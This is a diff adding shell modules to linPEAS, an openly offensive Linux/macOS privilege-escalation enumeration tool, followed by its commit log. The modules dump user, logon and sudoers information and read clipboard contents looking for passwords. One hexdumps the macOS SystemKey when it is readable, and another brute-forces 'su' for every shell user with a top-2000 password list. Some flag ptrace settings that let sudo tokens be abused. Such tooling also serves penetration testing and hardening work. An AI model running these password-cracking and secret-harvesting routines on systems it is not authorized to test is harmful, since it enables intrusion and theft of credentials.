+        grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
+      fi
+    done
+  fi
+fi
+echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/13_Users_groups.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/13_Users_groups.sh
@@ -0,0 +1,22 @@
+# Title: Users Information - Users & groups
+# ID: UG_Users_groups
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get all users & groups
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables: $groupsB, $groupsVB, $knw_grps, $knw_usrs, $MACPEAS, $nosh_usrs, $sh_usrs, $USER
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "All users & groups"
+if [ "$MACPEAS" ]; then
+  dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
+else
+  cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
+fi
+echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/14_Login_now.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/14_Login_now.sh
@@ -0,0 +1,18 @@
+# Title: Users Information - Login now
+# ID: UG_Login_now
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Login now
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables: $knw_usrs, $nosh_usrs, $sh_usrs, $USER
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Login now"
+(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/15_Last_logons.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/15_Last_logons.sh
@@ -0,0 +1,18 @@
+# Title: Users Information - Last logons
+# ID: UG_Last_logons
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Last logons
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables: $knw_usrs, $nosh_usrs, $sh_usrs, $USER
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+print_2title "Last logons"
+(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/16_Login_info.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/16_Login_info.sh
@@ -0,0 +1,29 @@
+# Title: Users Information - Login info
+# ID: UG_Login_info
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Last time logon each user
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables: $knw_usrs, $MACPEAS, $nosh_usrs, $sh_usrs, $USER
+# Initial Functions:
+# Generated Global Variables: EXISTS_FINGER, ushell
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+print_2title "Last time logon each user"
+lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+
+EXISTS_FINGER="$(command -v finger 2>/dev/null || echo -n '')"
+if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
+  dscl . list /Users | while read un; do
+    ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2)
+    if grep -q "$ushell" /etc/shells; then #Shell user
+      finger "$un" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+      echo ""
+    fi
+  done
+fi
+echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/17_Password_policy.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/17_Password_policy.sh
@@ -0,0 +1,32 @@
+# Title: Users Information - Password policy
+# ID: UG_Password_policy
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get assword policy
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title
+# Global Variables: $EXTRA_CHECKS, $MACPEAS
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Password policy"
+  grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
+  echo ""
+
+  if [ "$MACPEAS" ]; then
+    print_2title "Relevant last user info and user configs"
+    defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
+    echo ""
+
+    print_2title "Guest user status"
+    sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
+    sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
+    sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
+    echo ""
+  fi
+fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/18_Brute_su.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/18_Brute_su.sh
@@ -0,0 +1,31 @@
+# Title: Users Information - Brute su
+# ID: UG_Brute_su
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Brute su
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_if_su_brute, print_2title, su_brute_user_num
+# Global Variables: $IAMROOT, $PASSTRY, $TIMEOUT
+# Initial Functions:
+# Generated Global Variables: $SHELLUSERS, $POSSIBE_SU_BRUTE
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then
+  print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
+  POSSIBE_SU_BRUTE=$(check_if_su_brute);
+  if [ "$POSSIBE_SU_BRUTE" ]; then
+    SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
+    printf "%s\n" "$SHELLUSERS" | while read u; do
+      echo "  Bruteforcing user $u..."
+      su_brute_user_num "$u" $PASSTRY
+    done
+  else
+    printf $GREEN"It's not possible to brute-force su.\n\n"$NC
+  fi
+else
+  print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC
+fi
+print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
--- a/linPEAS/builder/linpeas_parts/6_users_information/1_Macos_my_user_hooks.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/1_Macos_my_user_hooks.sh
@@ -0,0 +1,20 @@
+# Title: Users Information - MacOS my user hooks
+# ID: UG_Macos_my_user_hooks
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get current user Login and Logout hooks
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables: $HOME, $MACPEAS
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$MACPEAS" ];then
+  print_2title "Current user Login and Logout hooks"
+  defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/1_My_user.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/1_My_user.sh
@@ -0,0 +1,19 @@
+# Title: Users Information - My User
+# ID: UG_My_user
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: My User
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $groupsB, $groupsVB, $idB, $knw_grps , $knw_usrs, $nosh_usrs,$sh_usrs, $USER
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "My user"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users"
+(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
+echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/2_Macos_user_hooks.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/2_Macos_user_hooks.sh
@@ -0,0 +1,22 @@
+# Title: Users Information - MacOS user hooks
+# ID: UG_Macos_user_hooks
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Enumerate all users login and logout hooks
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables: $MACPEAS 
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$MACPEAS" ];then
+  print_2title "All Login and Logout hooks"
+  defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
+  defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist
+  echo ""
+
+fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/3_Macos_keychains.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/3_Macos_keychains.sh
@@ -0,0 +1,21 @@
+# Title: Users Information - Macos systemKey
+# ID: UG_Macos_keychains
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get macOS systemKey
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables: $MACPEAS
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$MACPEAS" ];then
+  print_2title "Keychains"
+  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker"
+  security list-keychains
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/4_Macos_systemkey.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/4_Macos_systemkey.sh
@@ -0,0 +1,24 @@
+# Title: Users Information - Macos systemKey
+# ID: UG_Macos_systemkey
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get macOS systemKey
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title
+# Global Variables: $MACPEAS
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$MACPEAS" ];then
+  print_2title "SystemKey"
+  ls -l /var/db/SystemKey
+  if [ -r "/var/db/SystemKey" ]; then
+    echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},";
+    hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},";
+  fi
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/5_Pgp_keys.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/5_Pgp_keys.sh
@@ -0,0 +1,22 @@
+# Title: Users Information - PGP keys
+# ID: UG_Pgp_keys
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: PGP keys
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title
+# Global Variables: 
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Do I have PGP keys?"
+command -v gpg 2>/dev/null || echo_not_found "gpg"
+gpg --list-keys 2>/dev/null
+command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys"
+netpgpkeys --list-keys 2>/dev/null
+command -v netpgp 2>/dev/null || echo_not_found "netpgp"
+echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/6_Clipboard_highlighted_text.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/6_Clipboard_highlighted_text.sh
@@ -0,0 +1,29 @@
+# Title: Users Information - Clipboard and highlighted text
+# ID: UG_Clipboard_highlighted_text
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Clipboard and highlighted text
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title
+# Global Variables: $DEBUG, $pwd_inside_history
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if [ "$(command -v xclip 2>/dev/null || echo -n '')" ] || [ "$(command -v xsel 2>/dev/null || echo -n '')" ] || [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
+  print_2title "Clipboard or highlighted text?"
+  if [ "$(command -v xclip 2>/dev/null || echo -n '')" ]; then
+    echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+    echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+  elif [ "$(command -v xsel 2>/dev/null || echo -n '')" ]; then
+    echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+    echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+  elif [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ]; then
+    echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+  else echo_not_found "xsel and xclip"
+  fi
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/7_Sudo_l.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/7_Sudo_l.sh
@@ -0,0 +1,32 @@
+# Title: Users Information - Sudo -l
+# ID: UG_Sudo_l
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title, print_info
+# Global Variables:$IAMROOT, $PASSWORD, $sudoB, $sudoG, $sudoVB1, $sudoVB2 
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
+(echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo"
+if [ "$PASSWORD" ]; then
+  (echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g") 2>/dev/null  || echo_not_found "sudo"
+fi
+( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" ) 2>/dev/null  || echo_not_found "/etc/sudoers"
+if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then
+  echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+fi
+for f in /etc/sudoers.d/*; do
+  if [ -r "$f" ]; then
+    echo "Sudoers file: $f is readable" | sed -${E} "s,.*,${SED_RED},g"
+    grep -Iv "^$" "$f" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g"
+  fi
+done
+echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/8_Sudo_tokens.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/8_Sudo_tokens.sh
@@ -0,0 +1,43 @@
+# Title: Users Information - Sudo tokens
+# ID: UG_Sudo_tokens
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Checking Sudo tokens
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $HOME, $CURRENT_USER_PIVOT_PID
+# Initial Functions: get_current_user_privot_pid
+# Generated Global Variables: $ptrace_scope
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Checking sudo tokens"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens"
+ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
+if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then
+  echo "ptrace protection is disabled (0), so sudo tokens could be abused" | sed "s,is disabled,${SED_RED},g";
+
+  if [ "$(command -v gdb 2>/dev/null || echo -n '')" ]; then
+    echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g";
+  fi
+
+  if [ "$CURRENT_USER_PIVOT_PID" ]; then
+    echo "The current user proc $CURRENT_USER_PIVOT_PID is the parent of a different user proccess" | sed -${E} "s,.*,${SED_RED},g";
+  fi
+
+  if [ -f "$HOME/.sudo_as_admin_successful" ]; then
+    echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},";
+  fi
+
+  if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then
+    echo "Current user has other interactive shells running: " | sed -${E} "s,.*,${SED_RED},g";
+    ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'
+  fi
+
+else
+  echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g";
+
+fi
+echo ""
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
SirBroccoli	bf1edc9a18	Update CONTRIBUTING.md	2024-09-23 14:41:43 +02:00
SirBroccoli	8d096a4c72	Merge pull request #438 from tunnellord/master User folder for cloud creds	2024-09-23 14:41:05 +02:00
Carlos Polop	d9f6e3eb46	fix issue 435	2024-09-23 14:36:50 +02:00
tunnellord	abfb06e77c	User folder for cloud creds	2024-09-22 14:35:21 +02:00
Carlos Polop	cb39091bfa	curl follow redirects	2024-09-19 11:57:19 +02:00
SirBroccoli	7979c470a1	Update CI-master_tests.yml	2024-09-05 14:02:04 +02:00
SirBroccoli	746ef49fc8	Merge pull request #432 from B-Kluss/patch-1 Fix: README.md Linpeas	2024-09-05 13:15:25 +02:00
B-Kluss	5fa7823e38	Fix: README.md Linpeas Exchange broken release page url	2024-09-05 10:29:53 +02:00
SirBroccoli	2e615f7bc6	Merge pull request #431 from peass-ng/dependabot/github_actions/dot-github/workflows/actions/download-artifact-4.1.7 Bump actions/download-artifact from 2 to 4.1.7 in /.github/workflows	2024-09-04 12:26:42 +02:00
SirBroccoli	5ecb01ed14	Merge pull request #430 from jeffbencteux/add-useful-software Update USEFUL_SOFTWARE.sh	2024-09-04 12:26:21 +02:00
dependabot[bot]	ac8a3fac97	Bump actions/download-artifact from 2 to 4.1.7 in /.github/workflows Bumps [actions/download-artifact](https://github.com/actions/download-artifact) from 2 to 4.1.7. - [Release notes](https://github.com/actions/download-artifact/releases) - [Commits](https://github.com/actions/download-artifact/compare/v2...v4.1.7) --- updated-dependencies: - dependency-name: actions/download-artifact dependency-type: direct:production ... Signed-off-by: dependabot[bot] <support@github.com>	2024-09-03 22:02:59 +00:00
Jeffrey Bencteux	f881a4719d	Update USEFUL_SOFTWARE.sh add lua and go binaries as it serves to escape restricted environments.	2024-09-03 15:14:35 +02:00
Carlos Polop	b3bcfa4466	f2	2024-08-28 21:57:32 +02:00
Carlos Polop	adc8e168a5	f	2024-08-28 21:11:54 +02:00
Carlos Polop	1a82bd8ee4	all arg	2024-08-28 20:03:32 +02:00
Carlos Polop	9408efbcd7	fix	2024-08-28 20:01:03 +02:00
Carlos Polop	bf00500bd1	fileanalysis winpeas not default	2024-08-28 19:52:24 +02:00
Carlos Polop	b3cd9417f8	fic	2024-08-28 00:06:09 +02:00
Carlos Polop	a3fe115848	update workflows	2024-08-28 00:02:29 +02:00
Carlos Polop	49efee3bb9	merge	2024-08-27 23:58:45 +02:00
Carlos Polop	0ed01d58d3	Big linpeas update	2024-08-27 23:56:21 +02:00
SirBroccoli	55326d29cc	Merge pull request #424 from 0danteh/patch-1 Refactor peasLoaded.py for Improved Efficiency	2024-08-27 22:59:24 +02:00
SirBroccoli	bffde719fa	Merge pull request #426 from inPhraZ/linpeas-container linPEAS: Add CVE-2021-41091 to docker version exploits	2024-08-27 22:56:21 +02:00
SirBroccoli	f296f659b6	Merge pull request #429 from shadowabi/master Update 3_cloud.sh for check_cvm	2024-08-27 22:54:36 +02:00
Carlos Polop	463154aa05	Merge branch 'master' of github.com:peass-ng/PEASS-ng	2024-08-27 22:10:06 +02:00
Carlos Polop	b435119723	WinPEASS Big Update	2024-08-27 22:08:48 +02:00
shadowabi	8afc352878	Update 3_cloud.sh add detect user data	2024-06-17 14:31:28 +08:00
shadowabi	efa0e98547	Update 3_cloud.sh for check_cvm Added connection timeout Settings and fixed wget syntax errors for check_cvm	2024-06-17 11:23:11 +08:00
Farzin Monsef	5c1f081344	checkDockerVersionExploits: add CVE-2021-41091	2024-06-02 17:43:33 +03:30
cp	74c1391d66	Merge pull request #421 from gcorrall/fix_find_possible_conf_files Fix 'find possible conf files with passwords' in 9_interesting_files.sh	2024-05-05 15:54:30 +02:00
Dante	fa5578b2ff	Refactor peasLoaded.py for Improved Efficiency This pull request introduces a set of improvements to the peasLoaded.py file, aimed at enhancing the readability, maintainability, and performance of the code. The key changes include: - Indentation Correction: Fixed the indentation to comply with Python standards, ensuring proper code block recognition and avoiding potential runtime errors. - List Comprehension: Implemented list comprehension for the creation of FileRecord instances, which simplifies the code structure and improves readability. - Configuration Handling: Streamlined the access to the config dictionary by extracting it once at the beginning of the loop, reducing repetitive code and potential access errors. - Default Value Usage: Utilized the .get() method with default values from DEFAULTS for both `auto_check` and `exec` keys. These changes do not alter the core functionality of the code but provide a cleaner and more efficient approach to the existing logic. Please review the changes and let me know if there are any concerns or further improvements that can be made.	2024-05-05 14:50:25 +02:00
cp	972503f806	Update CI-master_tests.yml	2024-05-05 11:48:54 +02:00
Gary Corrall	d8f86e81b2	Fix 'find possible conf files with passwords' in 9_interesting_files.sh	2024-04-11 14:54:27 +01:00
cp	a2fb2cd2be	Update 3_cloud.sh	2024-04-08 11:31:00 +02:00
cp	5621c83110	Merge pull request #420 from shadowabi/master Delete the condition that Tencent Cloud detection is liable to cause false positives	2024-04-08 11:30:14 +02:00
shadowabi	751d61b27f	Update 3_cloud.sh Delete the condition that Tencent Cloud detection is liable to cause false positives	2024-04-08 14:41:46 +08:00
Carlos Polop	c37db4654c	peass-ng	2024-04-04 11:30:56 +02:00
cp	e879812f45	Merge pull request #419 from MikeLauer/patch-1 Fix copy-paste mistake in Firefox.cs	2024-04-04 11:15:49 +02:00
Mike	db41676cdf	Fix copy-paste mistake in Firefox.cs	2024-04-01 15:35:56 +02:00
HackTricks	e32f496f12	Update FileAnalysis.cs	2024-03-23 13:02:56 +01:00
Carlos Polop	aee8acf60f	Update 3_cloud.sh	2024-02-26 20:40:36 +01:00
Carlos Polop	a79fb7f5d5	Update 3_cloud.sh	2024-02-25 20:50:25 +01:00
Carlos Polop	0dccf2f2a8	Merge pull request #415 from LionelOvaert/patch-1 Add try-except for PrintCachedCreds	2024-02-23 15:12:38 +01:00
Carlos Polop	0cc314fe04	Merge pull request #413 from md347/master Update FileAnalysis.cs	2024-02-23 15:10:27 +01:00
Carlos Polop	186ae60e9e	fix	2024-02-21 16:39:57 +01:00
Carlos Polop	c4e858d226	cloud functions	2024-02-21 16:39:46 +01:00
Carlos Polop	8468c666f9	Merge pull request #408 from shadowabi/master support of Tencent Cloud Enumeration	2024-02-21 16:15:22 +01:00
Lionel Ovaert	b430fc80bd	Add try-except for PrintCachedCreds	2024-02-18 21:09:53 +01:00
shadowabi	2f687dde18	Update 3_cloud.sh Fixed an error and added an auxiliary judgment	2024-02-16 00:46:58 +08:00
md347	41d6a03db3	Update FileAnalysis.cs escape backslashes in regex	2024-02-13 21:54:08 +00:00
Carlos Polop	b4b8afa169	Merge pull request #411 from wowlolx/master Fixed netsh command for spaces in SSIDs	2024-01-31 11:37:19 +01:00
wowlolx	8c7f56631f	Fixed netsh command for spaces in SSIDs	2024-01-31 00:34:27 +05:00
shadowabi	2d68186677	Format alignment	2024-01-25 11:58:51 +08:00
shadowabi	177fe211d0	Update 3_cloud.sh	2024-01-25 11:55:34 +08:00
shadowabi	9960d4780f	Add files via upload	2024-01-25 11:52:11 +08:00
shadowabi	4260e06722	add Tencent CVM metadata search	2024-01-25 11:49:20 +08:00
Carlos Polop	398081451f	Merge pull request #407 from Esonhugh/master linpeas Cloud.sh: support of Alibaba Cloud Enumeration	2024-01-24 18:13:22 +01:00
Carlos Polop	2dfbe62e64	Merge pull request #406 from mcdruid/master fix typo in 'run unshare' container check	2024-01-24 18:12:53 +01:00
Carlos Polop	12ff600e52	Merge pull request #403 from Signum21/master Better error handling in FileAnalysis	2024-01-24 18:11:02 +01:00
Esonhugh	edd8e3a397	feat: instance name and type	2024-01-22 22:04:21 +08:00
Esonhugh	7daefe700f	update: bug of req var error	2024-01-22 21:49:22 +08:00
Esonhugh	0c5b8194d3	format: better format of aliyun network print	2024-01-22 21:46:12 +08:00
Esonhugh	74ccf2c08a	fix: missing do at the of for	2024-01-22 21:39:41 +08:00
Esonhugh	9865e2a5b0	feat: aliyun network enumeration	2024-01-22 21:32:48 +08:00
Esonhugh	a8b7084b3e	feat: aliyun cloud support [incomplete]	2024-01-22 21:07:32 +08:00
mcdruid	5c4f81d0d4	fix typo in 'run unshare' container check	2024-01-16 16:11:42 +00:00
Carlos Polop	46612a23aa	Merge pull request #405 from d4t4s3c/patch-1 useful for when on the victim host we have access to the internet but…	2024-01-13 16:36:49 +01:00
Carlos Polop	a762fdd29e	Merge pull request #404 from AidanFeess/master Create powershell versions of the peas2json.py and json2html.py parsers	2024-01-13 16:36:26 +01:00
Carlos Polop	048428236c	Merge pull request #400 from lenhart/master Fix Typo in SNMP Check	2024-01-13 16:35:29 +01:00
d4t4s3c	28a8f4b3e9	useful for when on the victim host we have access to the internet but we do not have: curl, wget or netcat	2024-01-13 13:40:24 +01:00
Aidan Feess	ad357d538a	remove irrelevant error message text	2023-12-14 14:46:00 -06:00
Aidan Feess	61a4f91baa	remove irrelevant error message text	2023-12-14 14:45:01 -06:00
Aidan Feess	c131c20a43	fix typo	2023-12-14 14:41:14 -06:00
Aidan Feess	f5339ae80c	add json to html powershell parser	2023-12-14 12:35:20 -08:00
Aidan Feess	ed4d60c64d	Add winpeas to json powershell parser	2023-12-14 12:34:32 -08:00
Signum21	340256b3b3	Better error handling in FileAnalysis The previous specific check doesn't handle the following exception, causing it to be catched by the last try/catch block. Error looking for regexes inside files: System.AggregateException: One or more errors occurred. ---> System.UnauthorizedAccessException: Access to the path '<REDACTED>' is denied.	2023-11-28 00:38:13 +01:00
lenhart	6da7bfb7f6	Fix Typo in SNMP Check	2023-11-15 11:51:33 +01:00
